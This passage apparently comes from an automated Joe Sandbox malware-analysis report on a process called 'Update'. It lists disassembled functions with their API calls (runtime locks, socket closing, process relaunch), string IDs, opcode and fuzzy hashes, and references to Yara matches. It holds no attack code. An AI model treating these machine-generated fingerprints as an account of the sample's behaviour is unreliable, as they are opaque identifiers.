                                                                                            • Instruction ID: dc6826cae3caa249559813a6ed8b8c453ecdac15f467e7b2a3008cc375bb23da
                                                                                            • Opcode Fuzzy Hash: bbafe3ca27799eb8b97b84fe021bbf5ea03d3257992c1593045a460b8a44ed7d
                                                                                            • Instruction Fuzzy Hash: 9E01A7761003145FD720EB76FCC8B5BB7E8EB88355F05095AE14687214C735E84ADA64
                                                                                            Function 009197B9 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(10015EB4,10017C00,00000008,009198C1,00000000,00000000,?,0000FFFF,009170E9,0091BB26), ref: 009197CA
                                                                                            • __lock.LIBCMT ref: 009197FE
                                                                                              • Part of subcall function 0091C11B: __amsg_exit.LIBCMT ref: 0091C13D
                                                                                              • Part of subcall function 0091C11B: RtlEnterCriticalSection.NTDLL(00000001), ref: 0091C145
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 0091980B
                                                                                            • __lock.LIBCMT ref: 0091981F
                                                                                            • ___addlocaleref.LIBCMT ref: 0091983D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
                                                                                            • String ID:
                                                                                            • API String ID: 3732598078-0
                                                                                            • Opcode ID: 1ae46c3c0705c16859de1524d443c2f78480582e4eecfadb3e0c6c510edcdf56
                                                                                            • Instruction ID: e94e7b2defbd60ff6ffee2357213e679bd2efb43a0587b8509a3538dccdf463f
                                                                                            • Opcode Fuzzy Hash: 1ae46c3c0705c16859de1524d443c2f78480582e4eecfadb3e0c6c510edcdf56
                                                                                            • Instruction Fuzzy Hash: 4B01ADB1904B04EEE721EF75C805389BBE0EF80321F10890EE4965B6A1CBB4EA80CB11
                                                                                            Function 00912CE7 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00912D13
                                                                                            • CancelIo.KERNEL32(?), ref: 00912D1D
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00912D26
                                                                                            • closesocket.WS2_32(?), ref: 00912D30
                                                                                            • SetEvent.KERNEL32(00000001), ref: 00912D3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 1486965892-0
                                                                                            • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                            • Instruction ID: e6e75791a9d956ccded32ab7703fc5d12158cae10f4a149a92efce2fec60a96f
                                                                                            • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                            • Instruction Fuzzy Hash: 1CF04F76100714EFE321DB94CC89F5677B8FB49B12F148658F6829B690C6B1F904CBA0
                                                                                            Function 034E2D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 034E2D5C
                                                                                            • CancelIo.KERNEL32(?), ref: 034E2D66
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 034E2D6F
                                                                                            • closesocket.WS2_32(?), ref: 034E2D79
                                                                                            • SetEvent.KERNEL32(00000001), ref: 034E2D83
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 1486965892-0
                                                                                            • Opcode ID: 4f215838ee7519f19d9a8bf35e7355e37f10174a3c571bc663d9721d4a8e74b0
                                                                                            • Instruction ID: 7b4061ce837d5da35cb8d7ad8d6ecf588eca63ade7fb1670ba551f9942c22660
                                                                                            • Opcode Fuzzy Hash: 4f215838ee7519f19d9a8bf35e7355e37f10174a3c571bc663d9721d4a8e74b0
                                                                                            • Instruction Fuzzy Hash: EEF08C76100304ABC320AF94DD0DF6673B8BB48B15F004A0CF68296694C6B1B5099BA0
                                                                                            Function 0091E116 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 0091E122
                                                                                              • Part of subcall function 009198E6: __getptd_noexit.LIBCMT ref: 009198E9
                                                                                              • Part of subcall function 009198E6: __amsg_exit.LIBCMT ref: 009198F6
                                                                                            • __getptd.LIBCMT ref: 0091E139
                                                                                            • __amsg_exit.LIBCMT ref: 0091E147
                                                                                            • __lock.LIBCMT ref: 0091E157
                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0091E16B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                            • String ID:
                                                                                            • API String ID: 938513278-0
                                                                                            • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                            • Instruction ID: fb734a8ded87bf37a6d7be8e49e93d42a5da6defb9b0dadb3e94ee2be2fdf03a
                                                                                            • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                            • Instruction Fuzzy Hash: B5F0B432B4861CABDB21FBB49813BDD32E0AF85724F144149F950A72D2CB3488C0DA56
                                                                                            Function 034F5006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 034F5012
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __getptd.LIBCMT ref: 034F5029
                                                                                            • __amsg_exit.LIBCMT ref: 034F5037
                                                                                            • __lock.LIBCMT ref: 034F5047
                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 034F505B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                            • String ID:
                                                                                            • API String ID: 938513278-0
                                                                                            • Opcode ID: 041f38245192d91ca51c7875846c92d55cb7c78e16a95fb48e248d389ee0dbb5
                                                                                            • Instruction ID: 0d4498e0974e5a5bd457ddb9acbdbf59c8f53bb673609c4c6cf0e41a5aeee7ec
                                                                                            • Opcode Fuzzy Hash: 041f38245192d91ca51c7875846c92d55cb7c78e16a95fb48e248d389ee0dbb5
                                                                                            • Instruction Fuzzy Hash: 40F0903A904701DFD760FBAAA401B4F73A0AF01B24F1C018FD719AF2D1CF6444429A9E
                                                                                            Function 030549C5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 030549D1
                                                                                              • Part of subcall function 0305381A: __getptd_noexit.LIBCMT ref: 0305381D
                                                                                              • Part of subcall function 0305381A: __amsg_exit.LIBCMT ref: 0305382A
                                                                                            • __getptd.LIBCMT ref: 030549E8
                                                                                            • __amsg_exit.LIBCMT ref: 030549F6
                                                                                            • __lock.LIBCMT ref: 03054A06
                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 03054A1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                            • String ID:
                                                                                            • API String ID: 938513278-0
                                                                                            • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                            • Instruction ID: ab04e78110053e9a9ce29b7f2f9dfed5f2a297d6369ce9499241b7341cf4bfcf
                                                                                            • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                            • Instruction Fuzzy Hash: 32F0F03A9073109BE6A9FB7998067DF76A0AF40660F148288FC04AF2D0DB240882CA59
                                                                                            Function 034EC910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 034EC932
                                                                                            • GetCommandLineW.KERNEL32 ref: 034EC938
                                                                                            • GetStartupInfoW.KERNEL32(?), ref: 034EC947
                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 034EC96F
                                                                                            • ExitProcess.KERNEL32 ref: 034EC977
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                            • String ID:
                                                                                            • API String ID: 3421218197-0
                                                                                            • Opcode ID: 5d5c004c05b038372f9fed2dee8ad3501d494ceaa497b3c90e9d61510fe6cb2a
                                                                                            • Instruction ID: 8aed41d88f962726d9822844f4c277c07882f6088230261f176f14c4b0b234a9
                                                                                            • Opcode Fuzzy Hash: 5d5c004c05b038372f9fed2dee8ad3501d494ceaa497b3c90e9d61510fe6cb2a
                                                                                            • Instruction Fuzzy Hash: FDF0B431584318BBEB20ABA0DC4DFEA7778FB04B04F100694B719A60E4DA716A89DF54
                                                                                            Function 034E75B0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 034E75D2
                                                                                            • GetCommandLineW.KERNEL32 ref: 034E75D8
                                                                                            • GetStartupInfoW.KERNEL32(?), ref: 034E75E7
                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 034E760F
                                                                                            • ExitProcess.KERNEL32 ref: 034E7617
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                            • String ID:
                                                                                            • API String ID: 3421218197-0
                                                                                            • Opcode ID: 5712d85c34bafa3549c3c1a1a10ad0b718fd457a877f3c63c7ff39709a27b550
                                                                                            • Instruction ID: 512436b9c20fb65c36f94832d411894385d62cc51c998122d933e2eed2d42b00
                                                                                            • Opcode Fuzzy Hash: 5712d85c34bafa3549c3c1a1a10ad0b718fd457a877f3c63c7ff39709a27b550
                                                                                            • Instruction Fuzzy Hash: C3F0E971584319BFE720BBA0DC4DFD97778FB04B04F100694B719A60D4D6716A49CF54
                                                                                            Function 034EF9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034F1CD0: _doexit.LIBCMT ref: 034F1CDC
                                                                                            • ___set_flsgetvalue.LIBCMT ref: 034EF9CA
                                                                                              • Part of subcall function 034F3CA0: TlsGetValue.KERNEL32(00000000,034F3DF9,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000), ref: 034F3CA9
                                                                                              • Part of subcall function 034F3CA0: DecodePointer.KERNEL32(?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06,0000000D), ref: 034F3CBB
                                                                                              • Part of subcall function 034F3CA0: TlsSetValue.KERNEL32(00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06), ref: 034F3CCA
                                                                                            • ___fls_getvalue@4.LIBCMT ref: 034EF9D5
                                                                                              • Part of subcall function 034F3C80: TlsGetValue.KERNEL32(?,?,034EF9DA,00000000), ref: 034F3C8E
                                                                                            • ___fls_setvalue@8.LIBCMT ref: 034EF9E8
                                                                                              • Part of subcall function 034F3CD4: DecodePointer.KERNEL32(?,?,?,034EF9ED,00000000,?,00000000), ref: 034F3CE5
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 034EF9F1
                                                                                            • ExitThread.KERNEL32 ref: 034EF9F8
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034EF9FE
                                                                                            • __freefls@4.LIBCMT ref: 034EFA1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                            • String ID:
                                                                                            • API String ID: 781180411-0
                                                                                            • Opcode ID: aca4f94f6df43afe37c6e45b23eaaee301cd85ccc7a3eca47f39a51a68f58aec
                                                                                            • Instruction ID: b1308ba03147bdf2eebd15107de2943efaf4ccaf360575cbf1bf26ca62559cbf
                                                                                            • Opcode Fuzzy Hash: aca4f94f6df43afe37c6e45b23eaaee301cd85ccc7a3eca47f39a51a68f58aec
                                                                                            • Instruction Fuzzy Hash: 2AE01A2EA0139A7FCB00BFF3890C85F3A1C9D00385F1A0446EB149F100DA25951196AA
                                                                                            Function 6C3A5872 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C39A893: GetLastError.KERNEL32(?,?,6C395151,?,6C371A6D,00000000), ref: 6C39A897
                                                                                              • Part of subcall function 6C39A893: SetLastError.KERNEL32(00000000,6C371A6D,00000000), ref: 6C39A939
                                                                                            • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,6C39B1CB,?,?,?,00000055,?,-00000050,?,?,?), ref: 6C3A5931
                                                                                            • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,6C39B1CB,?,?,?,00000055,?,-00000050,?,?), ref: 6C3A5968
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CodePageValid
                                                                                            • String ID: PX;lE$utf8
                                                                                            • API String ID: 943130320-2026738284
                                                                                            • Opcode ID: 8cff4de51fc6c334d709104020dec8ae0c8784e07b2954227912a356f228fd0d
                                                                                            • Instruction ID: aaaf28757bd27e5ad03b91866425b8b302f7c5efc0ac17f50dc59b2d4284e5f5
                                                                                            • Opcode Fuzzy Hash: 8cff4de51fc6c334d709104020dec8ae0c8784e07b2954227912a356f228fd0d
                                                                                            • Instruction Fuzzy Hash: AA515732705A01AAE7159BF0CC81BA673ACEF09318F14042AE555DBE80F771D5668F66
                                                                                            Function 6C37BD70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C38B2CF: __EH_prolog3.LIBCMT ref: 6C38B2D6
                                                                                              • Part of subcall function 6C38B2CF: std::_Lockit::_Lockit.LIBCPMT ref: 6C38B2E1
                                                                                              • Part of subcall function 6C38B2CF: std::locale::_Setgloballocale.LIBCPMT ref: 6C38B2FC
                                                                                              • Part of subcall function 6C38B2CF: _Yarn.LIBCPMT ref: 6C38B312
                                                                                              • Part of subcall function 6C38B2CF: std::_Lockit::~_Lockit.LIBCPMT ref: 6C38B34F
                                                                                              • Part of subcall function 6C374CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6C374CD5
                                                                                              • Part of subcall function 6C374CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6C374CEF
                                                                                              • Part of subcall function 6C374CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6C374D10
                                                                                              • Part of subcall function 6C374CA0: __Getctype.LIBCPMT ref: 6C374DC4
                                                                                              • Part of subcall function 6C374CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6C374DF7
                                                                                            • std::ios_base::_Addstd.LIBCPMT ref: 6C37BE72
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$AddstdGetctypeH_prolog3SetgloballocaleYarnstd::ios_base::_std::locale::_
                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                            • API String ID: 3375204848-1866435925
                                                                                            • Opcode ID: ca674ed2b67c7c0d23dd6f367021add164d2609787b2ae5a07d1ffb17e9d784f
                                                                                            • Instruction ID: dfd83fcc8d33156852a118e077a71a30c7d881cc5e5089390eddee675e18bd44
                                                                                            • Opcode Fuzzy Hash: ca674ed2b67c7c0d23dd6f367021add164d2609787b2ae5a07d1ffb17e9d784f
                                                                                            • Instruction Fuzzy Hash: 7851D3B4A017058FEB14CF64D8457AEBBB0FF44318F10422CE5166BB90D775A945CFA1
                                                                                            Function 6C3726C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C38B51D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C38B529
                                                                                            • _strlen.LIBCMT ref: 6C372718
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlenstd::invalid_argument::invalid_argument
                                                                                            • String ID: Y.7l$ios_base::badbit set$string too long
                                                                                            • API String ID: 4097767454-2837425648
                                                                                            • Opcode ID: ec84cbbbc231eb1e8765ca1ca96bf0838211ab718026a720017e5603c12b62f3
                                                                                            • Instruction ID: 3cd1c72ff08345285e74ce00fad627c5f397ba9d3732c5ca8cbf15c9467c898e
                                                                                            • Opcode Fuzzy Hash: ec84cbbbc231eb1e8765ca1ca96bf0838211ab718026a720017e5603c12b62f3
                                                                                            • Instruction Fuzzy Hash: A141B7B2C01259DBCB10CF64DD84BDEBBB5EF48314F150225E844A7741E73A9A54CFA5
                                                                                            Function 034E9430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E944A
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEF9B
                                                                                              • Part of subcall function 034EEF86: __CxxThrowException@8.LIBCMT ref: 034EEFB0
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEFC1
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E9482
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF4E
                                                                                              • Part of subcall function 034EEF39: __CxxThrowException@8.LIBCMT ref: 034EEF63
                                                                                              • Part of subcall function 034EEF39: std::exception::exception.LIBCMT ref: 034EEF74
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 1823113695-4289949731
                                                                                            • Opcode ID: e374b5363f9f9c598f25ddc83bc244d20eb3577ea3bb37fd7704f578ec8ebd0c
                                                                                            • Instruction ID: f399e20dd65e23c3f26e517db1759098466fa57d563263c9515b8ed0ab193a36
                                                                                            • Opcode Fuzzy Hash: e374b5363f9f9c598f25ddc83bc244d20eb3577ea3bb37fd7704f578ec8ebd0c
                                                                                            • Instruction Fuzzy Hash: DD21B6337043109FD721DE6CF88099AF799EB91666B240A6FE192CF3D0D766D840C7A9
                                                                                            Function 034E84B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E84C9
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEF9B
                                                                                              • Part of subcall function 034EEF86: __CxxThrowException@8.LIBCMT ref: 034EEFB0
                                                                                              • Part of subcall function 034EEF86: std::exception::exception.LIBCMT ref: 034EEFC1
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E84E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 963545896-4289949731
                                                                                            • Opcode ID: 3ccdb48b8e4fb6ad6bd396580803f952415e867c36e15fb6be9139163f638000
                                                                                            • Instruction ID: 302a30d45bf42a3541bb70d282f17101d85ab6c6a4844211ef10af22a26a0ce5
                                                                                            • Opcode Fuzzy Hash: 3ccdb48b8e4fb6ad6bd396580803f952415e867c36e15fb6be9139163f638000
                                                                                            • Instruction Fuzzy Hash: 52219D32700306AF8B14DF6CE980C69B3A9FF88616714466EE526CF751EB31E954CB98
                                                                                            Function 00923A27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBCMT ref: 00923A3A
                                                                                              • Part of subcall function 00923995: ___BuildCatchObjectHelper.LIBCMT ref: 009239CB
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00923A51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 3487967840-3733052814
                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                            • Instruction ID: 0035318665668b5443196d8e9be81a98862319aaf3f0af187e823d4265d33d18
                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                            • Instruction Fuzzy Hash: A701463100012ABBDF12AF51ED45FEB7F6AEF48340F008020BD5815165D73ADAB1DBA1
                                                                                            Function 00021770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __current_exception.VCRUNTIME140 ref: 000217AF
                                                                                            • __current_exception_context.VCRUNTIME140 ref: 000217B9
                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000217C0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __current_exception__current_exception_contextterminate
                                                                                            • String ID: csm
                                                                                            • API String ID: 2542180945-1018135373
                                                                                            • Opcode ID: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
                                                                                            • Instruction ID: fee3ce6806449a47d22f27ac16de2c17e19a9547f2d977005fe60887edde41f1
                                                                                            • Opcode Fuzzy Hash: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
